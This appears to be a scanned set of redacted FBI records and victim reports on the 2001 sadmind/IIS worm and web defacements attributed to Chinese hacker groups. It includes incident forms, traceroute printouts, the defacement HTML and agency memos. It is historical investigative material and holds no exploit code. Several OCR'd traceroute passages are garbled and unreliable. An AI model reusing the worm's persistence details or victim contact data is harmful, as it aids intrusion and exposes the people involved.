Sent: Wednesday, May 09, 2001 3:35 PM b7C 


To: 'nipc.watch@fbi.gov' 
Subject: Cyber Incident Report Form 


Report date time- 


Name b6 
Telephone Fax Number-503-988-3749 exi[ — ] 

Email 

Organization-Multnomah County ISD 

Addrs Street-4747 E. Burnside St 

City-Portland 

State-OR 

Zip Code-97215 

Country-USA 

Question] Organization-SAME 


Question] Contact Info[ |] b6 


Questionl Tele Number-503-988-3749 ext] — | b7C 
Questionl Street-SAME 

Questionl City State Zipcd-SAME 

Question] Country-SAME 


Question] Email-SAME 

Question2 Location-4747 E. burnside St 
Portland, OR 97215 

ISD Data Center 


Question3 Date Time-05/06/01 12:36:08.683 -14:35:03:975 
Question4 Critical-Yes 
Questions crit infrasture-Government Operations 
Question5_ Remarks-No Remarks 

Question6 nature of prob- Web site defacement 

Question6 other- 

Question7 exp problem-No 

Question7 Remarks-No Remarks 

Question8 method of attack- Vulnerability exploited 


FW: Cyber Incident 2 e Page 2 of2 


Question8 method of attack-Other 

Question8 Remarks-A fast spreading worm called admind/IIS Worm, documented 
at CERT on May 8th. 

http://www.cert.org/advisories/CA-2001-11.html 
Question9_sus_perpetrators=Other 

Question9_Remarks=Chinese hacker/s making political anti USA Statments. At 
this time we do not feel that we were specifically targeted. 
Question10_ip_addrs=211.75.85.1 

Question! 1_evid_of_spoof=Unknown 

Questionl2 oper systems-NT 

Sec? oper systems-Other 

Question12_Remarks=and windows 2000. a total of four known systems where 
successfully attacked 

Question13 security infrasture-Firewall 
Question13 security infrasture-Intrusion Detection System 
Question13 security infrasture-Packet filtering 
Questionl4 attack loss info-Unknown 

Question14_Remarks=No Remarks 

QuestionI5 damage systms- Yes 

Question15_ Remarks-default webpages were over written 
Question16 what actions-Other 

Question16 what actions-Log files examined 

Question16_Remarks=All Chinese source IP address are being denyed access at 
the firewall. AIl but one of the effected webservers have been patched to 
prevent this in the future. 

Question17 fieldoff inform=Yes 

Question17 Field Office-Portland Oregon 

Question) 8 agency inform-No 

Question18 State local Police= 

Question18 Inspector General- 

Question18_CERT-CC= 

Question18. FedCIRC- 

Question18 JTF-CND- 

Question18 Other- 

Question19 date of last update- 

Question19 org work update- 

Question20 POC Information= 

Question20 sys adm contract-No 

Question21 remarks-We have repaired three of the four affected servers. One 
server that belongs to the Multnomah County Sheriffs office has been left 
intact for forensic purposes. We have yet to get in touch wih[ | 
[dot the FBI to discuss further what needs to be done. WE did contact 

and he said that we should at least fill out this form.. 


56 
b7C 


b7E 


| 
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May OS Di 03:25p Union Baker ESD (5413 962-0782 p.i 


Organization: FBI-Portland ~ Attention] | Re c 


Fax: (503) 615-6625 
Date: May 9, 2001 | 
Subject: Web Site Hacking 

Pages: 12, Including this page 


- Union Baker Education Service District 
10100 McAlister Road 
Island City, OR 97850 
Office: (541) 963-4106 
Fax: (541) 963-7256 


May 09 D1 03:25p Union Baker ESD (541)962-¬0782 


Aue - es E o⁄⁄25/9/ 
Von roo? exe geveed fines 06: 41 


** Neal rac 24 218 88 40 


em De offe ` Wis - corerodterl angen dw net l ` BUgn.09i€f-gwneronet ` 
Avg Time. 271 ms m s “Avg Time: 251 më Avg Time: 207 ms 
E ae s 
-6 S | 
acri-foopback.sanfranciscost d.cw net Xcore2-seriaÐ-1-0-0,sanfrartcisco.cw net 
Avg Time: 255ms _. Ñ Avg Tine: 231 ms 
gbr3-pS0.SffCafp.sit.net tee? acte fl net guten att.net 
Avg Time: 258 ms" AVR Time: 250 më p, Tits see 
E ae C. " 
gor3-p20,cgcil.ip.att net gd Gë clm kam ed 
Avg Time: 273 ms Avg Time; 265 ms 6 
kasrQi-Iwasrot Gees? net 2431 045... ` gura pao bt maip.et.net 
Avg Time: 231 mS" nv Tene: 224 mE p "vg Time: 208 ms 
BN TM Be 
Iwgsr01-ndeasri2 ne mecEsvane net 15 5X3 1B 


AM Node 23 of 23 S 
Mame: luv2golf. rre mediaone net 
IP Address: 24.218.88.40 
24.147. 8213, " Geographic focelion unknown. R 
AG Kan 255 mS Sạc Network: ServiceCo LLC - Road Runner (NET-ROAD-RƯNNE 


Registrant. 
AUT Media 1 (MEDIAONE2-DOM) 
l) dapi -84 High Speed Data 
i "Aw 9785 Maroon Circle 
24.218.868 40. c. o4 75 cl Suite 420 
KỶ ————-___—... Englewoad, CO 80138 
Ping Node 23-w2gof: eR ne GA 218, ` uS 


Bast] SH Sd) DQ m 21 [leo race 2621899. 7: L T RSE 


Ta E TP 
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Ke e 


E hk Agen seht 


` Neolrace: 200 54 165 122 


zl race: |. Save -Pret Ge | | Ping nn ` Us 
PE AGED E UR ee me ae ee e aa A ` mm -" x 
i-a ZE aier net E pat nba Ç Bas `? 
ANR Time: 246 ms" Bug Te 228 ms 
i ~G | 
130.st-5-1-D1r2Jax9 after net 0.80-3-0-042,fax9.ater net i 
Avg Time: 257 ms Avg Time: 230 ms | 
Ix-7-0.bb8.newyorktelegiobe net ` ` if-@-0corel. Aen if-5-0-1 TỶ... 
Avg Time: 308 HIR . AVR Tine: 331 mẹ... Em Tine: 216 ms 
df DT it-2-1.core1 Jin 22122006060. 
Avg Time: 330 ms ` Avg Time: 221 ms 
Km CD 
91-0-100 ortmlasd! rifelofonica-data net atm-10-0-0-201 border Saan L 
Avg Time: 303 HS ug Time: 613 ms p “Avg Time: AAMS 
Ta " _ ns] vu 
RU 7 i- "ol | : 
213.140.38.176 customergw-recip-laflorida.nap telefonicamundo.cl |] 
Avg Time: 437 ms Avg Time: 598 ms H 
Sch 
= E 
165-122 leased ust e d  200:54 144.34 
Avg Time: 431 ms... “Avg Time: 425 ms 


` | Node 28 of 28 Quen 
Name: 165-122 leased.custtie.cl 


iP Address: 200.54.165.122 

oU Location: 33.500S, 70.5500 f 
200.54.1 65-1 22 [... | Network: Universidad del Mer (NETBLICNET-BLK-UMAR) |" ` 
= SC No match for domain tie cl. 


FEM emu ER ay ai ae s I lồn amp 
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` 163.41.177 [1] 


«html»«body bgcolor=black><br><br><br><br><br><br><table 
width=100%><td><p align="center"><font size-7 color=red>fuck USA 
Government</font><tr><td><p align="center"><font size=7 color=red> 
fuck 

PoizonBOx<tr><td><p align="center"><font size=4 
color-red»contact:sysadmcneyahoo.com.cn«/html» 
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FAY ø82- 6s - céa35 


Target: 24.218.88.40 
Date: Tue May 08 15:29:55 2001 


Nodes: 22 


Node Net Who IP Address 


OPN OAR WH ch 


NNN A o o eh wen o oz 
Na GDG rd OA b G3 N6 sé G 


= 
e 
ta. 
® 


0 OO OQ b WD = 


18 
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Bu 
© 
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Oi 


i id + 


163.41.177.35 
163.41.177.1 
163.41.254.233 
198.237.0.5 
207.98.66.11 
207.98.64.162 
204.70.32.5 
204.70.9.131 
206.24.210.61 
192.205.32.225 
12.123.13.66 
12.122.2.149 
12.122.1.126 
12.122.2.50 
12.122.5.58 
12.123.40.137 
12.125.33.18 
24.91.0.1 
24.147.0.193 
24.147.0.213 
24.128.0.14 
24.218.88.40 


(541)962-0782 p.5 
Page 1 of 4 
(An error occured when saving the map image) 
Node Data 
Location Node Name 
45.329N 1180944 | 
- lesd-fast-6-0-0.open-south.k12.0r.US 
= eugn-cart-gw.nero.net 
- eugn-core1-gw.nero.net 
San Francisco Xcore2-serial0-1-0-0.sanfrancisco.cw.net 
San Francisco corerouter1.sanfrancisco.cw.net 
San Francisco acri-loopback.sanfranciscosfd.cw.net 
San Francisco cw-gw.sffca.ip.att-net 
San Francisco gbr3-p50.sffca.ip.att.net 
Chicago, IL, US gbr3-p80.cgcil.ip.ait.net 
Chicago, IL, US gbr4-p60.cacil.ip.att.net 
- gbr4-p50.cb1ma.ip.att.net 
- gbr1-p100.cb1ma.ip.att.net 
- gar2-p360.cb1ma.ip.att.net 
¬ cmbrma-rtr02-srp5.core.ne.rr.com 
- dvrsm01-exrsm01.ne.mediaone.net 
38.921N 77.395W  luv2golf.ne.mediaone.net 
Packet Data 
High Low Avg Total Lost 
0 0 0 1 0 
2 2 2 1 0 
58 58 58 1 0 
48 48 48 1 0 
27 27 27 1 0 
31 31 31 54 0 
217 217 217 1 0 
61 61 61 1 0 
48 48 48 1 0 
69 69 69 1 0 
64 64 64 1 0 
112 112 112 1 0 
96 96 96 1 0 
123 123 123 1 0 
131 131 131 1 0 
131 131 131 1 0 
127 127 127 1 0 
148 148 148 1 0 
05/08/2001 


b6 
b7C 


b6 
Gris 
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19 127 

20 110 

21 114 

22 — 
Network Data 

Network id#:1 


University of Oregon (NET-UOFORESEARPK) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:2 


Oregon Exchange (NETBLK-OREGON-EXCH) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:3 


Cable & Wireless USA (NETBLK-CW-BACKBONE) 
9000 Regency Parkway, Suite 200 
Cary, NC 27511 
US 


Network id#:4 


Cable & Wireless USA (NETBLK-CW-OSBLK) 
9000 Regency Parkway, Suite 200 
Cary, NC 27511 
US 


Network id#:5 


AT&T Data Communications Services (NETBLK-ATT) 
5000 Hadley Road 
South Plainfield, NJ 07080 
US 


Network id#:6 


AT&T ITS (NET-ATT) 
200 Laurel Avenue South 
Middletown, NJ 07748 
Us 


Network id#:7 


Continental Cablevision (NETBLK-CVSN-CCNE-2BL) 
Pilot House - Lewis Wharf 
Boston, MA 02110 
Us 


Network id#:8 
file://C:\Program™%20Files\NeoTracePro\Results\TracePreview:htm 05/08/2001 
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ServiceCo LLC - Road Runner (NET-ROAD-RUNNER-7) 
13241 Woodland Park Road 
Herndon, VA 20171 
US 


Network id#9 


ServiceCo LLC - Road Runner (NET-ROAD-RUNNER-2) 
13241 Woodland Park Road 
Herndon, VA 20171 
US 


Network idit: 10 


ServiceCo LLC - Road Runner (NET-ROAD-RUNNER-6) 
13241 Woodland Park Road 
Herndon, VA 20171 
US 


Whois Data 
Whois idi: 1 


Registrant information not available. 
Whois id#: 2 


Registrant: 

Network for Engineering and Research in Oregon (NERO (NERO-DOM) 
101 Covell Ha11 
Corvallis, OR 97331 


Whois idi: 3 


Registrant: 

Cable & Wireless, Inc. (CW3-DOM) 
1919 Gallows Road 
Vienna, VA 22182 


Whois id#: 4 


Registrant: 

AT&T Corp. (ATT2-DOM) 
55 Corporate Drive 
Bridgewater, NJ 08807 
US 


Whois id#: 5 

Registrant: 

EXCALIBUR Group, A Time Warner Company (RR6-DOM) 
13241 Woodland Park Rd 


Herndon, VA 20171 
US 


Whois idit: 6 


Registrant: 
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Media 1 (MEDIAONE2-DOM) 
High Speed Data 
9785 Maroon Circle 
Suite 420 
Englewood, CO 80138 
US 


NeoTrace Copyright ©1997-2000 NeoWorx inc. 
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Union Baker ESD 


(541)962-0782 p.39 


NeoTrace Version 3.0] - TRIA cember 20 2000) Trace Results Page 1 of 4 
Target: 200.54.165.122 
Date: Tue May 08 15:32:26 2001 
Nodes: 29 
(An error occured when saving the map image) 
Node Data 
Node Net Who IP Address — Location Node Name 
1 - - — 16341477.35 — 45.329N “sonw i b6 
2 1 - 163.41.477.1. - PIC 
3 4 - 1634117725 - 
4 - 1 198.237.0.5 - lesd-fast-B-0-0.open-south.k12.or.us 
5 2 2 207.98.66.11  - eugn-car1-gw.nero.net 
6 2 2 207.98.64.161  - eugn-core2-gw.nero.net 
7 2 2 207.98.64.14 - ptid-core2-gw.nero.net 
8 2 2 207.98.64.178 - pild-core1-gw.nero.net 
9 3 3 157.130.182.209 Portland pos3-3.gw2.por3.alter.net 
10 4 3 152.63.104.98 Portland 142.at-6-0-0.xr2.por3.alter.net 
11 - 3 152.63.104.202 Portland 190.at-1-0-0.tr2.por3.alter.net 
12 - 3 152.63.5.121 33.967N 118.242W 130.at-5-1-0.tr2 av alter. nei 
13 - 3 137.39.4.207  33.967N 118.242W lo0.xr2.lax9.alter.net 
14 4 3 152.63.115.170 33.967N 118.242W 0.so-3-0-0.xI2.lax9.alter.net 
15 4 3 152.63.115.5 33.967N 118.242W pos7-0.br3.iax9.alter.net 
16 5 4 207.45.200.197 33.967N 118.242W if-5-0-1.bb3.losangeles.teleglobe.net 
17 5 4 207.45.220.65 33.967N 118.242W if-2-0.core1.losangeles.teleglobe.net 
18 5 4 2074622067 New York, NY, it-9-0.core1.newyork.teleglobe.net 
19 5 4 207.45.223.110 US" York, NY, if-10-0.bb8.newyork.teleglobe.net 
20 5 4 20745.19886 New York, NY, ix-7-0.bb8.newyork teleglobe.net 
21 6 5 213.140.36.122 - a1-0-100.grtmiasd1 .ri.telefonica-data.net 
22 8 - 213.140.38.178 - 
atm-10-0-0- 
2 l -> 200.10.224.134 - 201.border1.nap.telefonicamundo.cl 
customergw-redip- 
24 T > 200.10.224.26 - lafiorida nap telefonicamundo.cl 
25 8 - 200.54.144.13 - tollgate-ppal-redip.tie.cl 
2 8 - 200.54.144.34 - 
27 B - 200.54.144.22  - 
28 — - 0.0.6.0 - No Response 
29 - 200.54.165.122 Puente Alto 165-122.leased.cust.tie.cl 
Packet Data 
Node High Low Avg Total Lost 
1 0 0 0 1 0 
2 3 3 3 1 0 
3 5 5 5 1 0 
4 20 20 20 1 0 
5 21 21 21 1 0 
6 241 241 241 1 0 
7 51 51 51 1 0 
file://C:\Program™%20Files\NeoTracePro\Results\TracePreview.him 05/08/2001 


Mag 09 01 03:27p Union Baker ESD 


8 50 50 
9 35 35 
10 40 40 
11 25 25 
12 48 48 
13 63 63 
14 55 55 
15 49 49 
16 64 64 
17 64 64 
18 118 118 
19 118 118 
20 128 128 
21 133 133 
22 228 228 
23 236 236 
24 234 234 
25 248 248 
26 263 263 
27 230 230 
28 — — 
29 410 410 
Network Data 
Network id#:1 


University of Oregon (NET-UOFORESEARPK) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:2 


Oregon Exchange (NETBLK-OREGON-EXCH) 
University of Oregon 
Eugene, OR 97403 
US 


Network id#:3 


UUNET Technologies, Inc. (NET-UUNETCUSTB40) 
3060 Williams Drive 
Fairfax, VA 22031 
US 


Network id#:4 


UUNET Technologies, Inc. (NET-UUNET-) 
3060 Williams Drive 
Fairfax, VA 22031 
US 


Network id#:5 


(541)962-0782 
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0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
2 
0 
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Teleglobe Inc. (NETBLK-GLOBEINTERNET2) 
1000, rue de La Gauchetiere ouest 
Montreal, OC H3B 4X5 
CA 


Network id#:6 


Telefonica Data S.A. 
C/ Francisco Silvela, 42 
Madrid 28028 
SPAIN 


Network id#:7 


Telefonica Mundo (NETBLK-PROV-2001) 
Exequiel Fernandez 5660 
Santiago, 

CL 


Network id#:8 


Telefonica Empresas (NETBLK-ISP-EMPRESAS) 
Bandera 162 Piso 7 
Santiago, 00 
Ch 


Network id#:9 


Universidad del Mar (NETBLK-NET-BLK-UMAR) 
Amunategui 1838 Recreo 
Vina del Mar, 00 
CL 


Whois Data 
Whois id: 1 


Registrant information not availabie. 
Whois idi: 2 


Registrant: 

Network for Engineering and Research in Oregon (NERO (NERO-DOM) 
101 Covell Hall 
Corvallis, OR 97331 


Whois idit: 3 


Registrant: 

UUNET Technologies, Inc. (ALTER-DOM) 
3060 Williams Drive 
Falls Church, VA 22031 
USA 


Whois id#: 4 


Registrant: 
Teleglobe Canada Inc. (TELEGLOBE2-DOM) 
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1000, rue de la Gauchet iere ouest 
Montreal, QC H3B 4X5 
CANADA 


Whois id#: 5 

Registrant: 

Telefonica S.A. (TELEFONICA-DATA2-DOM) 
Gran Via, 28 


Madrid, M E-20013 
ES 


NeoTrace Copyright ©1997-2000 NeoVWWorx inc. 
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Logs from NT box that was defaced 


E: 
PKZIP (Compressed) 
files Here are the logs and web pages that we found as well as the contents of the scripts dir. 
the logs here are from our special ed database server (a dell poweredge ) and has only had IIS reinstalled and the inetpub 
directory erased 


as to the other box that was defaced it has been completely reformatted and restored from tape backup. 
there were 2 dirs of logs both are in there... | have them on floppy as well 


there is also evidence in the logs of the other break-in that we had but that was stopped and was an abuse of a 
anonymous FTP account that was active and had write access...it was used to store and distribute stolen software like 
games and programs before they were released in stores. 


b6 
Union Baker ESD b7C 


10100 N McAlister Road 
Island City, OR 97850 
phone 541-963-4106 e 
fax 541-962-0782 


(01/26/1998) A e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/06/2001 
To: Chicago 


From: Chicago 
Squad IP/C 


Contact: sa; Jans | E: 
Approved By: vix 
Drafted By: 


case 1p #:[_]|_ Trending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To open sub file for the above captioned case. 


Details: Due the amount of e-mail generated by the above 
captioned case it is requested that the following sub file be 


created: 
[—— — —] E 


b7E 


++ 


` b3 
SCH T | b7E | 


e i e IPIC 
(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/16/2001 


To: Counterterrorism Attn: NIPC, CIU, SSA b3 
Chicago SA qua 


From: Cleveland 
Squad 16 


contact: af (216) 622-6917 


Approved By: 


Drafted By: 


Case ID #: Pending) 


Title:  UNSUB(S), CHINA; 
SOUTHWEST GENERAL HOSPITAL, CLEVELAND, OH; 
BETHUNE COORMAN COLLEGE, DAYTONA BEACH, FL; 
COMPUTER INTRUSIONS 


Synopsis: To report complaints received at Cleveland Division 
re: victims of SADMIND/IIS worm originating from China. 


Enclosure(s): One FD-340 containing evidence from Southwest 
General Hospital; One FD-340 containing evidence from Bethune 
Cookman College. 


b6 
b7C 


Details: On 05/08/200,|D | |southwest 
General Hospital (SGH), 18 d, Middleburg Heights, 
OH, work telephone number poem telephonically advised 
as follows: 


On 05/06/2001, at approximately 08:31am, the home page 
on SGH's external E-mail server, mail.swgeneral.com, IP address 
206.69.0.3, was replaced with a page declaring "fuck the U.S." 
and "fuck poizon box." The replaced home page also contained the 
E-mail address of sysadmcn@yahoo.com.cn. The victim machine was 
a Compaq, running MS Windows NT Server v4.0, Service Pack 5, and 

"MS Internet Information Server (IIS) v4.0. The.victim machine 
also runs MS Exchange and is primarily used as an external E-mail 
Server. The SGH firewall, a Watchgard Firebox II, IP address 
206.669.0.2, registered scanning activity around the time of the 
intrusion, originating from IP addresses 208.152.233.2; 
211.100.10.158; and, 211.23.21.254. IP address 208.152.233.2 is 
registered to Bethune Cookman College, Daytona Beach, FL. TP 
address 211.100.10.158 is registered to a contact in China. IP 
address 211.23.21.254 is registered to a contact in Taiwan. 


To: _Coun i From: Cleveland , 
Re: 05/16/2001 b3 
b7E 


The enclosed FD-340 contains a floppy diskette 
containing the following files:  logcopy.txt (firewall log); 
index.htm (installed by hacker); index.asp (installed by hacker); 
default.htm (installed by hacker); and, default.asp (installed by 
hacker). The hacker files were found in the following 
directories:  /iis/samples; /ipnetpub; c:/; /scripts; and, 

/ wwwroot. 


has incurred a financial loss of $480, 
based on man hours.  SGH's external E-mail server b6 
was unavailable and offline for approximately 30 hours. EG 
installed MS Windows NT Server v4.0 Service Pack 6a 
atter e incident. 


On 05/08/2001, writer telephonically contacted] | 
Ls Bethune Cookman College (BCC Daytona Beach, FL, wor 
elephone number (904)255-1401. pm c as follows: 

On 05/05/2001 at approximately 10:00am - 11:00am, and 
on 05/08/2001 at approximately 07:00am - 08:00am, three 
computers, running Solaris v2.6, at BCC were compromised by the 
SADMIND/IIS worm. One machine was the DNS server and the two 
other machines were workstations. The hacker installed a file 
called uni.tar which was extracted (and later removed) in 
directory /dev/cuc. The script modified file s71rpc located in 


directory /rc2.d. The script performed Internet scans for 
computers running IIS. The scan results were stored in /dev/cuc. 


To date, BCC has incurred a financial loss of 
approximately $1,000, based on man hours recovering from this 
incident. The enclosed FD-340 contains a floppy diskette 
containing a file called worm.tar (evidence found on victim 
machines). 


Cleveland Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 


ir « 


To: Counterterrorism From: Cleveland 
Re: T 05/16/2001 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
Take action deemed appropriate. 
++ 


$ 


b3 
b7E 


f aw P 
(Rev. 10-01-1999) b 0 


FEDERAL BUREAU OF INVESTIGATION 


HIL 


Precedence: ROUTINE Date: 05/16/2001 


To: Chicago Attn: SA , 312/907-8680 
San Diego SA 858/499-7793 


From: Mobile 
Squad 5 


Approved By: b3 
b6 
Drafted By: b7C 
b7E 


Case ID #: (Pending) 
(Pending) 


(Pending) 


Title:  HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
COMPUTER INTRUSION; 
04/30/2001 


cool iiOn, 

HONKER UNION OF CHINA; 

CALIFORNIA BAJA INTERNET SERVICE - VICTIM; 
INTRUSION - INFORMATION SYSTEMS 


Synopsis: Provide information re above captioned cases to 
Chicago and San Diego. 


Enclosure(s): Enclosed for Chicago are the [uec copy 


of the three FD-302's regarding interviews with of Bay b6 
Networking Technolo of OnLine Information b7C 
Systems, and of The-Store.com. 6 1A envelope's 


containing the following: original interview notes of the 
previously listed interviewees (3), a CD-ROM containing computer 
log files from the compromised Windows NT server at Bay 
Networking' Technology, 2 CD-ROM's and 1 floppy disk containing 
log files from the compromised NT Server at OLIS, and computer 
log files provided by The-Store.com. 


Enclosed for San Dieg opy of the three FD- 
302's regarding interviews ud Bay Networking b6 
ecology, | CÓ of OnLine Information Systems, and b7C 


of The-Store.com. 


Details: Mobile interviewed the followin ersons regarding the 
above captioned investigations:| SSC a 


— 
b7E 


a? e e 
To: Chicago Fron?” Mobile 
Re: DY 05/16/2001 b3 


b6 
b"7C 
b7E 


Further questions should be directed to SA 
34/415-3209. 


To: Chicago M Mobile 
Re: El 05/16/2001 b3 


b7E 


LEAD(s):. 
Set Lead 1: 
CHICAGO 
AT CHICAGO, ILLINOIS 


Utilize enclosed information as necessary for above 
captioned investigation at Chicago. 


Set Lead 2: 
SAN DIEGO 
AT SAN DIEGO, CALIFORNIA 
Information enclosed for informational purposes 


regarding above captioned investigations. Utilize information as 
necessary for investigation at San Diego. 


Lé 


` 
(01/26/1998) e e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE D 
To: Memphis Attn: Squad 
SSA 
From: Chicago 
Squad IP/C 
Contact: SA 312/78 


Approved By: 


Drafted By: 

Case ID #: 

Title: Subject: Hacker/Honker Union of Chin 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


King NÓ To set lead for Memphis Division, 


ate: 05/09/2001 


5 


6-3918 


a 


Squad 5, sAL | 


Administrative: Reference telephone call between sa| | and SA 
on May 8, 2001. 


Details: Chicago Division is the lead office 
investigation of the Honkers Union of China, 
Hackers Union of China, specifically, actions 
States Web sites originating out of China. 


Many of the attacks have taken the 
defacements. 


On May 8, 2001, QNEM hae 
that one of First Tennessee Bank's Web sites, 
been the victim of a Web site defacement. Th 
Web site, "fuck USA Government fuck PoisonBOx 


contact:sysadminGyahoo.com.cn", is a common s 
many of the defacements. 


for the criminal 
sometimes called the 
against United 


form of Web page 


SA [ ] to inform 


www.ftcm.com, had 
e statement on the 


tatement seen on 


Other victims of this defacement have traced the IPs 


back to the People's Republic of China. 


J ^ D Po, 
NN) fe ČH 


b3 
b6 
Gris 
b/E 


bế 
Gris 


b6 
Gris 


b3 
b6 
b7C 
b7E 


To: j _ Chicago @ 


Re: 05/09/2001 b3 
b7E 
LEAD(s): 
Set Lead 1: 
MEMPHIS 


AT MEMPHIS, TN 


b6 


It is requested that SAL ` perform appropriate ae 


investigation, more specifically, obtain log files from the 
victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA 


++ 


(01/26/1998) @ f 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: New York Attn:  NIPC Squad 
sa[ — — — —] s 
bề 
From: Chicago bức 
Squad IP/C be 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: T r New York Division, NIPC Squad, SA 
| | b6 


b7C 
Administrative: Reference telephone call between sal 
and Sal lon May 7, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 7, 2001, sats contacted aal ` Ire bồ 
inform that New York Division was receiving numerous complaints pue 
regarding Web site defacements originating from IP addresses in 
China with derogatory statements toward the United States. Many 
of the sites contained the following statement, "fuck USA 
Government fuck PoisonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


To: New York e. Chicago o 


e Rr] 05/13/200: 


LEAD(s): 
Set Lead 1: 
NEW YORK 


AT NEW YORK, NY 


It is requested that aal perform appropriate 
investigation, more specifically, obtain log files from the 
victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/05/2001 
To: All Divisions Attn: NIPC Squads 
Counter Terrorism Computer Investigations Unit 
CIOJ NIPC, Room 5965 
SSA 
Chicago ASAC 
SSA 
SA 
From: Chicago 
Squad IP/C 
Contact: SA 312/786-3918 


Approved By: 
Drafted By: 
Case ID #: Pending) 


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To canvas all divisions for information concerning the 
Honkers Union of China or Hackers Union of China. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. Also, as a part of 
this investigation, United States based groups carrying out 
actions against Web sites originating out of China are being 
investigated. 


The attacks have taken the form of denial of service 
attacks, installation of the Adore worm and Web page defacements. 
Attacks have been reported in Chicago, Washington, D.C., San 
Francisco, and Portland, Oregon. 


All receiving divisions are requested to canvas 
appropriate sources for information regarding any of the 


activities detailed above. Any positive info ion should be 
forwarded to Chicago Division, Squad IP/C, SA 
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To: All Divisions From: Chicago 


b7E 


LEAD(s): 
Set Lead 1: 
ALL RECEIVING OFFICES 


It is requested that all receiving offices canvas 
Sources for information regarding the above detailed activities 


and report an ositive information to Chicago Division, Squad 
IP/C, SAL] telephone number 313/786-3918. d 
b7C 


++ 
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05/21/01 
16:51:45 


Case ID: 
Serial: 


Set to: ADMINISTRATIVE SERVICES 


Lead Upload Report 


ALBANY 
ALBUQUERQUE 
ALMATY 

AMMAN 

ANCHORAGE 

ANKARA 

ATHENS 

ATLANTA 

BALTIMORE 

BANGKOK 

BERLIN 

BERN 

BICS 

BIRMINGHAM 
BOGOTA 

BOSTON 

BRASILIA 
BRIDGETOWN 
BRUSSELS 
BUCHAREST 

BUENOS AIRES 
BUFFALO 

BUTTE ITC 

CATRO 

CANBERRA 

CARACAS 

CHARLOTTE 
CINCINNATI 
CLEVELAND 
COLUMBIA 
COPENHAGEN 
COUNTERTERRORISM 
CRIM JUSTICE INFO SVCS 
CRIMINAL INVESTIGATIVE 
CRIT INCIDENT RESPONSE 
DALLAS 

DENVER 

DETROIT 
DIRECTOR'S OFFICE 
EL PASO 

EL PASO INT CENTER 
FINANCE 

FORT MONMOUTH ITC 
GENERAL COUNSEL 
HONG KONG 
HONOLULU 

HOUSTON 


ICMLPE11 
Page 1 


05/21/01 
16:52:20 


Case ID: 
Serial: 


ICMLPE11 
Page 2 


INDIANAPOLIS 
INFORMATION RESOURCES 
INSPECTION 
INVESTIGATIVE SERVICES 
ISLAMABAD 
JACKSON 
JACKSONVILLE 
KANSAS CITY 
KIEV 
KNOXVILLE 
LABORATORY 
LAGOS 

LAS VEGAS 
LITTLE ROCK 
LONDON 

LOS ANGELES 
LOUISVILLE 
MADRID 

MANILA 
MEMPHIS 
MEXICO CITY 
MIAMI 
MILWAUKEE 
MINNEAPOLIS 
MOBILE 

MOSCOW 
NAIROBI 
NATIONAL SECURITY 
NEW DELHI 

NEW HAVEN 
NEW ORLEANS 
NEW YORK 
NEWARK 
NORFOLK 
OKLAHOMA CITY 
OMAHA 

OTTAWA 

PANAMA CITY 
PARIS 
PHILADELPHIA 
PHOENIX 
PITTSBURGH 
POCATELLO ITC 
PORTLAND 
PRAGUE 
PRETORIA 
RICHMOND 
RIYADH 


05/21/01 i Lead Upload Report © ICMLPE11 
16:52:45 Page 3 


Case ID: b3 
Serial: b7E 


Set to: ROME 
SACRAMENTO 
SALT LAKE CITY 
SAN ANTONIO 
SAN DIEGO 
SAN FRANCISCO 
SAN JUAN 
SANTIAGO 
SANTO DOMINGO 
SAVANNAH ITC 
SEATTLE 
SEOUL 
SINGAPORE 
SPRINGFIELD 
ST LOUIS 
TAIPEI 
TALLINN 
TAMPA 


*** Unable to be set. *** 
Reason: 
Set to office invalid. 
OFFICE: TECHNICAL SERVICES 


Set to: TEL AVIV 
TORYO 
TRAINING 
VIENNA 
WARSAW 
WASHINGTON FIELD 
DIRECTOR'S OFFICE 


Set to: DIRECTOR'S OFFICE 
Set to: DIRECTOR'S OFFICE 


Total leads set: 123 
Total leads not set: i 


The following investigation was conducted by SA 
| | b6 


b7C 
On 05/07/2001, SAL.... |] received multiple 
complaints from New York area businesses that suffered web site 


defacements. The following is a list of those companies that 
contacted the New York Office: 


On-Line Design 
b6 


555 Theodore Fremd b7C 
Suite A-200 
Rye, New York 1-580 


914-967-7100 ext[ | 


Guideline New York 


3 W.35th Street 
New York, NY 10001 


p 


Internet Accounting Software 


roadhollow Road 
Suite 420 


Softheon, Inc. 


25 East Loop Road 


IERI Technologies Inc. 


1900 Grand Ave. 
